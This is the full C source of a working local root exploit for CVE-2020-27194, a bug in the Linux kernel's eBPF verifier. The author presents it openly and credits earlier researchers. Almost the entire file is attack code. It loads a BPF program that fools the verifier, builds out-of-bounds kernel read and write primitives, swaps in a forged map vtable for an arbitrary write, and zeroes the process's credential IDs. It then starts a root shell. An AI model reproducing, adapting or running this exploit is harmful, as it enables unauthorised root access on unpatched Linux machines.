/* 
 * blasty-vs-ebpf.c -- by blasty <peter@haxx.in> 
 * =============================================
 *
 * the Linux eBPF verifier, the gift that keeps on giving.
 * 
 * exploit for CVE-2020-27194, discovered by Simon Scannell[1] 
 * exploit strategy shamelessly lifted from Manfred Paul[2]
 *
 * this wouldn't exist if it weren't for the gentlemen listed
 * above. this was mostly a crash course in (e)BPF for me personally. ;)
 *
 * this is not the most polished piece of work right now, feel free to
 * send me a revised copy. only tested on Ubuntu Groovy (20.10, 5.8.0-25-generic)
 * as of writing.
 *
 * enjoy!
 *
 * -- blasty // 20201104
 * 
 * [1] https://scannell.me/fuzzing-for-ebpf-jit-bugs-in-the-linux-kernel/
 * [2] https://www.thezdi.com/blog/2020/4/8/cve-2020-8835-linux-kernel-
 *     privilege-escalation-via-improper-ebpf-program-verification
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <stdarg.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <linux/bpf.h>
#include <linux/unistd.h>

#define MAP_VTAB_OFFSET               0x20
#define MAP_VTAB_IDX                  (MAP_VTAB_OFFSET/8)
#define BPF_MAP_SIZE                  0x110
#define OOB_MAP_OFFSET(x)             (BPF_MAP_SIZE - x)

#define BPF_MAP_MAP_OPS_OFF           0x00
#define BPF_MAP_MAP_TYPE_OFF          0x18
#define BPF_MAP_MAX_ENTRIES_OFF       0x24
#define BPF_MAP_SPINLOCK_OFF          0x2c
#define BPF_MAP_BTF_OFF               0x40

#define BPF_MAP_OPS_COUNT             37
#define BPF_MAP_OPS_PUSH_ELEM_IDX     14
#define BPF_MAP_OPS_GET_NEXT_KEY_IDX  4

#define LOG_BUF_SIZE                  65536
#define VALUE_SIZE                    0x2000

#define info(fmt, args...) report('$', false, fmt, ## args)
#define infov(fmt, args...) report('~', false, fmt, ## args)
#define error(fmt, args...) report('!', true, fmt, ## args)
#define info_value64(name, value) infov("%-24s: %016lx", name, value)

enum operation_type {
    OPERATION_INVALID = 0,
    OPERATION_READ32,
    OPERATION_READ64,
    OPERATION_WRITE32,
    OPERATION_WRITE64,
    OPERATION_HAXMAP
};

#define BPF_LDX_MEM(SIZE, DST, SRC, OFF)             \
    ((struct bpf_insn) {                             \
     .code  = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,    \
     .dst_reg = DST,                                 \
     .src_reg = SRC,                                 \
     .off   = OFF,                                   \
     .imm   = 0 })                    

#define BPF_STX_MEM(SIZE, DST, SRC, OFF)             \
    ((struct bpf_insn) {                             \
     .code  = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,    \
     .dst_reg = DST,                                 \
     .src_reg = SRC,                                 \
     .off   = OFF,                                   \
     .imm   = 0 })

#define BPF_JMP_IMM(OP, DST, IMM, OFF)               \
    ((struct bpf_insn) {                             \
     .code  = BPF_JMP | BPF_OP(OP) | BPF_K,          \
     .dst_reg = DST,                                 \
     .src_reg = 0,                                   \
     .off   = OFF,                                   \
     .imm   = IMM })

#define BPF_MOV32_IMM(DST, IMM)                      \
    ((struct bpf_insn) {                             \
     .code  = BPF_ALU | BPF_MOV | BPF_K,             \
     .dst_reg = DST,                                 \
     .src_reg = 0,                                   \
     .off   = 0,                                     \
     .imm   = IMM })

#define BPF_EXIT_INSN()                              \
    ((struct bpf_insn) {                             \
     .code  = BPF_JMP | BPF_EXIT,                    \
     .dst_reg = 0,                                   \
     .src_reg = 0,                                   \
     .off   = 0,                                     \
     .imm   = 0 })

#define BPF_LD_IMM64(DST, IMM)                       \
    BPF_LD_IMM64_RAW(DST, 0, IMM)

#define BPF_LD_IMM64_RAW(DST, SRC, IMM)              \
    ((struct bpf_insn) {                             \
     .code  = BPF_LD | BPF_DW | BPF_IMM,             \
     .dst_reg = DST,                                 \
     .src_reg = SRC,                                 \
     .off   = 0,                                     \
     .imm   = (__u32) (IMM) }),                      \
    ((struct bpf_insn) {                             \
     .code  = 0,                                     \
     .dst_reg = 0,                                   \
     .src_reg = 0,                                   \
     .off   = 0,                                     \
     .imm   = ((__u64) (IMM)) >> 32 })

#define BPF_JMP_REG(OP, DST, SRC, OFF)               \
    ((struct bpf_insn) {                             \
     .code  = BPF_JMP | BPF_OP(OP) | BPF_X,          \
     .dst_reg = DST,                                 \
     .src_reg = SRC,                                 \
     .off   = OFF,                                   \
     .imm   = 0 })

#define BPF_LD_MAP_FD(DST, MAP_FD)                   \
    BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)

#define BPF_MOV64_REG(DST, SRC)                      \
    ((struct bpf_insn) {                             \
     .code  = BPF_ALU64 | BPF_MOV | BPF_X,           \
     .dst_reg = DST,                                 \
     .src_reg = SRC,                                 \
     .off   = 0,                                     \
     .imm   = 0 })

#define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM)       \
    ((struct bpf_insn) {                             \
     .code  = CODE,                                  \
     .dst_reg = DST,                                 \
     .src_reg = SRC,                                 \
     .off   = OFF,                                   \
     .imm   = IMM })

#define BPF_ALU64_IMM(OP, DST, IMM)                  \
    ((struct bpf_insn) {                             \
     .code  = BPF_ALU64 | BPF_OP(OP) | BPF_K,        \
     .dst_reg = DST,                                 \
     .src_reg = 0,                                   \
     .off   = 0,                                     \
     .imm   = IMM })

#define BPF_ST_MEM(SIZE, DST, OFF, IMM)              \
    ((struct bpf_insn) {                             \
     .code  = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM,     \
     .dst_reg = DST,                                 \
     .src_reg = 0,                                   \
     .off   = OFF,                                   \
     .imm   = IMM })

#define BPF_MOV32_REG(DST, SRC)                      \
    ((struct bpf_insn) {                             \
     .code  = BPF_ALU | BPF_MOV | BPF_X,             \
     .dst_reg = DST,                                 \
     .src_reg = SRC,                                 \
     .off   = 0,                                     \
     .imm   = 0 })

#define BPF_MOV64_IMM(DST, IMM)                      \
    ((struct bpf_insn) {                             \
     .code  = BPF_ALU64 | BPF_MOV | BPF_K,           \
     .dst_reg = DST,                                 \
     .src_reg = 0,                                   \
     .off   = 0,                                     \
     .imm   = IMM })

#define BPF_ALU64_REG(OP, DST, SRC)                  \
    ((struct bpf_insn) {                             \
     .code  = BPF_ALU64 | BPF_OP(OP) | BPF_X,        \
     .dst_reg = DST,                                 \
     .src_reg = SRC,                                 \
     .off   = 0,                                     \
     .imm   = 0 })

// prototypes
uint64_t read64(uint64_t addr);
uint32_t read32(uint64_t addr);

typedef struct {
    uint64_t map_ops_ptr;
    uint32_t spin_lock_off;
    uint32_t max_entries;
    uint32_t map_type;
} bpfmap_orig_t;

// globals
char g_bpf_log_buf[LOG_BUF_SIZE];
uint64_t g_fake_vtab[BPF_MAP_OPS_COUNT];
int g_mapfd;
int g_sockets[2];
int g_fake_vtab_enabled = 0;
bpfmap_orig_t g_bpfmap_orig;

// radix tree code carefully lifted from the kernel source,
// and hacked up to work from userland with the read primitives

#define RADIX_TREE_ENTRY_MASK 3UL
#define RADIX_TREE_INTERNAL_NODE 2UL

#define XA_RETRY_ENTRY xa_mk_internal(256)
#define RADIX_TREE_RETRY XA_RETRY_ENTRY

#define XA_CHUNK_SHIFT 6
#define XA_CHUNK_SIZE (1UL << XA_CHUNK_SHIFT)
#define RADIX_TREE_MAP_SHIFT XA_CHUNK_SHIFT
#define RADIX_TREE_MAP_SIZE (1UL << RADIX_TREE_MAP_SHIFT)
#define RADIX_TREE_MAP_MASK (RADIX_TREE_MAP_SIZE-1)

#define radix_tree_root xarray
#define radix_tree_node xa_node

#define spinlock_t int
#define gfp_t int

struct list_head {
    struct list_head *next, *prev;
};

struct rcu_head {
    struct rcu_head *next;
    void (*func)(struct rcu_head *head);
};

struct xa_node {
    unsigned char shift;
    unsigned char offset;
    unsigned char count;
    unsigned char nr_values;
    struct xa_node *parent;
    struct xarray *array;
    union {
        struct list_head private_list;
        struct rcu_head rcu_head;
    };
    void *slots[XA_CHUNK_SIZE];
};

struct xarray {
    spinlock_t xa_lock;
    gfp_t xa_flags;
    void* xa_head;
};

static inline void *xa_mk_internal(uint64_t v) {
    return (void *)((v << 2) | 2);
}

static inline struct radix_tree_node *entry_to_node(void *ptr) {
    return (void *)((uint64_t)ptr & ~RADIX_TREE_INTERNAL_NODE);
}

static inline void *node_to_entry(void *ptr) {
    return (void *)((uint64_t)ptr | RADIX_TREE_INTERNAL_NODE);
}

static inline uint64_t shift_maxindex(unsigned int shift) {
    return (RADIX_TREE_MAP_SIZE << shift) - 1;
}

static inline bool radix_tree_is_internal_node(void *ptr) {
    return 
        ((uint64_t)ptr & RADIX_TREE_ENTRY_MASK) == RADIX_TREE_INTERNAL_NODE;
}

static inline uint64_t node_maxindex(const struct radix_tree_node *node) {
    return shift_maxindex(read32((uint64_t)node) & 0xff);
}

static unsigned radix_tree_load_root(
    uint64_t root_addr, struct radix_tree_node **nodep, uint64_t *maxindex
) {
    struct radix_tree_node *node = (struct radix_tree_node*)read64(root_addr+8);

    *nodep = node;

    if (radix_tree_is_internal_node(node)) {
        node = entry_to_node(node);
        *maxindex = node_maxindex(node);
        return (read32((uint64_t)node) & 0xff) + RADIX_TREE_MAP_SHIFT;
    }

    *maxindex = 0;
    return 0;
}

static unsigned int radix_tree_descend(
    const struct radix_tree_node *parent,
    struct radix_tree_node **nodep, uint64_t index
) {
    unsigned int offset = 
        (index >> (read32((uint64_t)parent)&0xff)) & RADIX_TREE_MAP_MASK;
    void **entry = (void**)read64((uint64_t)(parent) + 0x28 + (offset * 8));
    *nodep = (void *)entry;
    return offset;
}

void *radix_tree_lookup(uint64_t root_addr, uint64_t index) {
    struct radix_tree_node *node, *parent;
    uint64_t maxindex;

restart:
    parent = NULL;
    radix_tree_load_root(root_addr, &node, &maxindex);
    if (index > maxindex)
        return NULL;

    while (radix_tree_is_internal_node(node)) {
        parent = entry_to_node(node);
        radix_tree_descend(parent, &node, index);
        if (node == RADIX_TREE_RETRY)
            goto restart;
        if ((read32((uint64_t)parent)&0xff) == 0)
            break;
    }

    return node;
}

// end of radix tree crap

void header() {
    printf(
        "\n"
        "      $$$ Linux 5.8.15+ CVE-2020-27194 exploit  $$$\n"
        "            -- by blasty <peter@haxx.in> --\n\n"
    );
}

void report(char indicator, bool error, const char *fmt, ...) {
    FILE *stream = (error) ? stderr : stdout;
    va_list a;
    va_start(a, fmt);
    fprintf(stream, "[%c] %s", indicator, (error) ? "ERROR: " : "");
    vfprintf(stream, fmt, a);
    fprintf(stream, "\n");
    va_end(a);

    if (error) {
        exit(-1); // all errors are fatal
    }
}

int bpf_hax_init() {
    int ret;

    union bpf_attr attr_create = {
        .map_type = BPF_MAP_TYPE_ARRAY,
        .key_size = sizeof(int),
        .value_size = VALUE_SIZE,
        .max_entries = 1
    };

    ret = syscall(__NR_bpf, BPF_MAP_CREATE, &attr_create, sizeof(attr_create));

    if (ret < 0) {
        error("failed to create map (%d)", errno);
    }

    g_mapfd = ret;

    struct bpf_insn oob_prog[]={
        BPF_LD_MAP_FD(BPF_REG_9, g_mapfd),
        BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
        BPF_ST_MEM(BPF_W, BPF_REG_10, -4, 0),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
        BPF_EXIT_INSN(),

        BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_0, 0),

        BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,  8), // R7 = oob_operation
        BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_0, 16), // R8 = offset
        BPF_LDX_MEM(BPF_DW, BPF_REG_9, BPF_REG_0, 24), // R9 = value

        BPF_LD_IMM64(BPF_REG_6, 25769803778UL),
        BPF_JMP_REG(BPF_JLT, BPF_REG_5, BPF_REG_6, 2),
        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),

        BPF_JMP_IMM(BPF_JGT, BPF_REG_5, 0, 2),
        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),

        BPF_ALU64_IMM(BPF_OR, BPF_REG_5, 0),
        BPF_MOV32_REG(BPF_REG_3, BPF_REG_5),
        BPF_ALU64_IMM(BPF_RSH, BPF_REG_3, 1),

        // verifier now thinks r3 == 0, but it is infact 1, oops!
        BPF_ALU64_REG(BPF_MUL, BPF_REG_8, BPF_REG_3),

        // OPERATION_READ32?
        BPF_JMP_IMM(BPF_JNE, BPF_REG_7, OPERATION_READ32, 6),

        BPF_ALU64_REG(BPF_SUB, BPF_REG_0, BPF_REG_8),
        BPF_LDX_MEM(BPF_W, BPF_REG_1, BPF_REG_0, 0),

        BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_8),
        BPF_STX_MEM(BPF_W, BPF_REG_0, BPF_REG_1, 0),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),

        // OPERATION_READ64?
        BPF_JMP_IMM(BPF_JNE, BPF_REG_7, OPERATION_READ64, 6),

        BPF_ALU64_REG(BPF_SUB, BPF_REG_0, BPF_REG_8),
        BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_0, 0),

        BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_8),
        BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_1, 0),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),

        // OPERATION_WRITE32?
        BPF_JMP_IMM(BPF_JNE, BPF_REG_7, OPERATION_WRITE32, 4),
        BPF_ALU64_REG(BPF_SUB, BPF_REG_0, BPF_REG_8),
        BPF_STX_MEM(BPF_W, BPF_REG_0, BPF_REG_9, 0),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),

        // OPERATION_WRITE64?
        BPF_JMP_IMM(BPF_JNE, BPF_REG_7, OPERATION_WRITE64, 4),
        BPF_ALU64_REG(BPF_SUB, BPF_REG_0, BPF_REG_8),
        BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_9, 0),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),

        // OPERATION_HAXMAP
        BPF_JMP_IMM(BPF_JNE, BPF_REG_7, OPERATION_HAXMAP, 20),

        BPF_MOV32_IMM(BPF_REG_9, 0),
        BPF_MOV64_IMM(BPF_REG_8, OOB_MAP_OFFSET(BPF_MAP_SPINLOCK_OFF)),
        BPF_ALU64_REG(BPF_MUL, BPF_REG_8, BPF_REG_3),
        BPF_ALU64_REG(BPF_SUB, BPF_REG_0, BPF_REG_8),
        BPF_STX_MEM(BPF_W, BPF_REG_0, BPF_REG_9, 0),
        BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_8),

        BPF_MOV32_IMM(BPF_REG_9, 0xffffffff),
        BPF_MOV64_IMM(BPF_REG_8, OOB_MAP_OFFSET(BPF_MAP_MAX_ENTRIES_OFF)),
        BPF_ALU64_REG(BPF_MUL, BPF_REG_8, BPF_REG_3),
        BPF_ALU64_REG(BPF_SUB, BPF_REG_0, BPF_REG_8),
        BPF_STX_MEM(BPF_W, BPF_REG_0, BPF_REG_9, 0),
        BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_8),

        BPF_MOV32_IMM(BPF_REG_9, BPF_MAP_TYPE_STACK),
        BPF_MOV64_IMM(BPF_REG_8, OOB_MAP_OFFSET(BPF_MAP_MAP_TYPE_OFF)),
        BPF_ALU64_REG(BPF_MUL, BPF_REG_8, BPF_REG_3),
        BPF_ALU64_REG(BPF_SUB, BPF_REG_0, BPF_REG_8),
        BPF_STX_MEM(BPF_W, BPF_REG_0, BPF_REG_9, 0),
        BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_8),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),
    };

    union bpf_attr attr_load = {
        .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
        .insns     = (uint64_t)((void *) oob_prog),
        .insn_cnt  = sizeof(oob_prog) / sizeof(struct bpf_insn),
        .license   = (uint64_t)((void *) "GPL"),
        .log_buf   = (uint64_t)(g_bpf_log_buf),
        .log_size  = LOG_BUF_SIZE,
        .log_level = 1,
    };

    attr_load.kern_version = 0;

    g_bpf_log_buf[0] = 0;

    int progfd = syscall(__NR_bpf, BPF_PROG_LOAD, &attr_load, sizeof(attr_load));

    if (progfd < 0) {
        printf("\nlog buffer:%s\n", g_bpf_log_buf);
        error("failed to load bpf program.\n");
    }

    info("we fooled the bpf program verifier, good!");

    if(socketpair(AF_UNIX, SOCK_DGRAM, 0, g_sockets)) {
        error("failed to create socket pair '%s'\n", strerror(errno));
    }

    if(setsockopt(
        g_sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)
    ) < 0) {
        error("setsockopt failed '%s'\n", strerror(errno));
    }

    return 0;
}

uint64_t bpf_hax_oob(int op, uint16_t offset, uint64_t value) {
    uint64_t buf[VALUE_SIZE/8];

    memset(buf, 0, VALUE_SIZE);

    buf[0] = 2;
    buf[1] = op;
    buf[2] = offset;
    buf[3] = value;

    if(g_fake_vtab_enabled) {
        memcpy(buf + MAP_VTAB_IDX, g_fake_vtab, BPF_MAP_OPS_COUNT * 8);
    }

    uint64_t key = 0;

    union bpf_attr attr_update = {
        .map_fd = g_mapfd,
        .key = (uint64_t)&key,
        .value = (uint64_t)&buf,
    };

    int ret = syscall(
        __NR_bpf, BPF_MAP_UPDATE_ELEM, &attr_update, sizeof(attr_update)
    );

    if (ret != 0) {
        error("%s: failed to update map (%d)", __FUNCTION__, errno);
        exit(-1);
    }

    char buffer[64];

    int n = write(g_sockets[0], buffer, sizeof(buffer));

    if (n < 0) {
        perror("write");
        error("%s: write() failed", __FUNCTION__);
    }

    if (n != sizeof(buffer)) {
        error("%s: short write: %d", __FUNCTION__, n);
    }

    if (op == OPERATION_HAXMAP) {
        return 0;
    }

    memset(buf, 0, sizeof(buf));
    union bpf_attr attr_lookup = {
        .map_fd = g_mapfd,
        .key = (uint64_t)&key,
        .value = (uint64_t)&buf
    };

    int err = syscall(
        __NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr_lookup, sizeof(attr_lookup)
    );

    if (err != 0) {
        error("%s: BPF_MAP_LOOKUP_ELEM failed: %d", __FUNCTION__, err);
    }

    return buf[0];
}

uint32_t oob_read32(uint16_t offset) {
    return bpf_hax_oob(OPERATION_READ32, OOB_MAP_OFFSET(offset), 0);
}

uint64_t oob_read64(uint16_t offset) {
    return bpf_hax_oob(OPERATION_READ64, OOB_MAP_OFFSET(offset), 0);
}

uint64_t oob_write32(uint16_t offset, uint32_t value) {
    return bpf_hax_oob(OPERATION_WRITE32, OOB_MAP_OFFSET(offset), value);
}

uint64_t oob_write64(uint16_t offset, uint64_t value) {
    return bpf_hax_oob(OPERATION_WRITE64, OOB_MAP_OFFSET(offset), value);
}

uint64_t oob_haxmap() {
    return bpf_hax_oob(OPERATION_HAXMAP, 0, 0);
}

uint32_t read32(uint64_t addr) {
    struct bpf_map_info info_buf;
    memset(&info_buf, 0, sizeof(info_buf));

    union bpf_attr info_attr;
    memset(&info_attr, 0, sizeof(info_attr));

    info_attr.info.bpf_fd = g_mapfd;
    info_attr.info.info_len = sizeof(info_buf);
    info_attr.info.info = (uint64_t)&info_buf;

    oob_write64(BPF_MAP_BTF_OFF, addr - 88);

    int err = syscall(
        __NR_bpf, BPF_OBJ_GET_INFO_BY_FD, &info_attr, sizeof(info_attr)
    );

    if (err != 0) {
        error("BPF_OBJ_GET_INFO_BY_FD failed: %d\n", err);
    }

    return info_buf.btf_id;
}

uint64_t read64(uint64_t addr) {
    uint32_t lo = read32(addr);
    uint32_t hi = read32(addr+4);
    return ((uint64_t)hi<<32) | lo;
}

void read_data(uint64_t addr, unsigned char *dst, size_t len) {
    uint32_t *o = (uint32_t*)dst;
    for(int i = 0; i < len; i += 4) {
        *o++ = read32(addr + i);
    }
}

void read_page(uint64_t addr, unsigned char *dst) {
    return read_data(addr, dst, 0x1000);
}

uint64_t mem_search_string(uint64_t start_addr, char *s) {
    uint8_t pagebuf[0x1000];
    start_addr &= ~0xfff;
    while(1) {
        read_page(start_addr, pagebuf);
        uint8_t *hit = (uint8_t*)memmem(pagebuf, 0x1000, s, strlen(s));
        if (hit != NULL) {
            return start_addr + (hit - pagebuf);
        }
        start_addr += 0x1000;
    }
    return 0;
}

uint64_t resolve_sym_naive(uint64_t start_addr, char *s) {
    uint64_t strtab_entry = mem_search_string(start_addr, s);
    uint64_t symtab_entry = strtab_entry & ~3;
    while(1) {
        uint64_t addr = symtab_entry + read32(symtab_entry);
        symtab_entry -= 4;
        if (addr == strtab_entry) {
            break;
        }
    }
    return symtab_entry + read32(symtab_entry);
}


void arb_write_install(uint64_t bpf_map_addr) {
    uint64_t fake_vtable_addr = bpf_map_addr + BPF_MAP_SIZE + MAP_VTAB_OFFSET;
    uint64_t buf[VALUE_SIZE/8];

    memset(buf, 0, VALUE_SIZE);

    uint64_t bpf_map_ops_addr = oob_read64(BPF_MAP_MAP_OPS_OFF);
    
    for(int i = 0; i < BPF_MAP_OPS_COUNT; i++) {
        g_fake_vtab[i] = read64(bpf_map_ops_addr + (i*8));
    }

    g_fake_vtab[BPF_MAP_OPS_PUSH_ELEM_IDX] = 
        g_fake_vtab[BPF_MAP_OPS_GET_NEXT_KEY_IDX];

    g_fake_vtab_enabled = 1;

    uint64_t key = 0;

    union bpf_attr attr_update = {
        .map_fd = g_mapfd,
        .key = (uint64_t)&key,
        .value = (uint64_t)&buf,
    };

    int ret = syscall(
        __NR_bpf, BPF_MAP_UPDATE_ELEM, &attr_update, sizeof(attr_update)
    );

    if (ret != 0) {
        error("%s: failed to update map", __FUNCTION__);
    }

    g_bpfmap_orig.map_ops_ptr   = oob_read64(BPF_MAP_MAP_OPS_OFF);
    g_bpfmap_orig.map_type      = oob_read32(BPF_MAP_MAP_TYPE_OFF);
    g_bpfmap_orig.max_entries   = oob_read32(BPF_MAP_MAX_ENTRIES_OFF);
    g_bpfmap_orig.spin_lock_off = oob_read32(BPF_MAP_SPINLOCK_OFF);

    oob_write64(BPF_MAP_MAP_OPS_OFF, fake_vtable_addr);
    oob_haxmap();
}

void arb_write32(uint64_t addr, uint32_t val) {
    uint64_t key = 0x666;

    uint64_t buf[VALUE_SIZE/8];
    memset(buf, 0, VALUE_SIZE);
    buf[0] = val-1;

    union bpf_attr attr_update = {
        .map_fd = g_mapfd,
        .key = (uint64_t)&key,
        .value = (uint64_t)&buf,
        .flags = addr
    };

    int ret = syscall(
        __NR_bpf, BPF_MAP_UPDATE_ELEM, &attr_update, sizeof(attr_update)
    );

    if (ret != 0) {
        printf("error: read32(0x%016lx, 0x%08x) failed\n", addr, val);
        exit(-1);
    }
}

void arb_write_uninstall() {
    oob_write32(BPF_MAP_MAP_TYPE_OFF, g_bpfmap_orig.map_type);
    oob_write32(BPF_MAP_MAX_ENTRIES_OFF, g_bpfmap_orig.max_entries);
    oob_write32(BPF_MAP_SPINLOCK_OFF, g_bpfmap_orig.spin_lock_off);
    oob_write64(BPF_MAP_MAP_OPS_OFF, g_bpfmap_orig.map_ops_ptr);
}

int main(int argc, char *argv[]) {
    header();

    if (bpf_hax_init() != 0) {
        printf("fail\n");
        return -1;
    }

    uint64_t array_map_ops = oob_read64(BPF_MAP_MAP_OPS_OFF);
    info_value64("array_map_ops", array_map_ops);

    uint64_t init_pid_ns = resolve_sym_naive(array_map_ops, "init_pid_ns");
    info_value64("init_pid_ns", init_pid_ns);

    /* 
     * struct pid_namespace {
     *   struct kref kref; // @ 0x00
     *   struct idr idr;   // @ 0x08 
     *   ...
     * };
     *
     * struct idr {
     *   struct radix_tree_root idr_rt; // @ 0x00
     *   ...
     * };
     *
     */
    info("finding our pid object.. (pid %d)", getpid());
    uint64_t pid_addr = 
        (uint64_t)radix_tree_lookup(init_pid_ns + 0x8, getpid());

    info_value64("pid struct", pid_addr);

    /*
     * struct pid {
     *   refcount_t count;
     *   unsigned int level;
     *   spinlock_t lock;
     *   struct hlist_head tasks[PIDTYPE_MAX]; // @ 0x10
     *   ..
     * };
     */
    // TODO: Add safety checks before dereffing all this shit
    uint64_t task_addr = read64(
        read64(read64(pid_addr + 0x10) + 0x08)
    );

    info_value64("task", task_addr);

    uint64_t cred_struct = read64(task_addr + 0x130);
    uint64_t files_struct = read64(task_addr + 0x190);

    info_value64("cred", cred_struct);
    info_value64("files", files_struct);

    uint64_t fdt = read64(files_struct + 0x20);
    info_value64("fdt", fdt);

    uint64_t fds = read64(fdt + 8);
    info_value64("fds", fds);

    uint64_t mapfd_ptr = read64(fds + (g_mapfd * 8));
    info_value64("mapfd", mapfd_ptr);

    uint64_t bpf_map_addr = read64(mapfd_ptr + 0xc8);
    info_value64("bpf_map", bpf_map_addr);

    info("installing arb write capability..");
    arb_write_install(bpf_map_addr);

    info("elevating privileges..");
    for(int i = 0; i < 8; i++) {
        arb_write32(cred_struct + 4 + i*4, 0);
    }


    // TODO: cant do this right now because the map is fucked
    //arb_write_uninstall();
    //oob_write64(BPF_MAP_BTF_OFF, 0);

    if (getuid() == 0 && getgid() == 0 && geteuid() == 0 && getegid() == 0) {
        info("bling bling, we got it!");
        execl("/bin/sh", "/bin/sh", NULL);
    } else {
#ifdef DEBUG_UID    
        printf("getuid: %d\n", getuid());
        printf("getgid: %d\n", getgid());
        printf("geteuid: %d\n", geteuid());
        printf("getegid: %d\n", getegid());
#endif
        error(
            "failed to elevate privileges.\n"
            "I hope your kernel survived the trip. :-(\n"
        );
    }

    return 0;
}
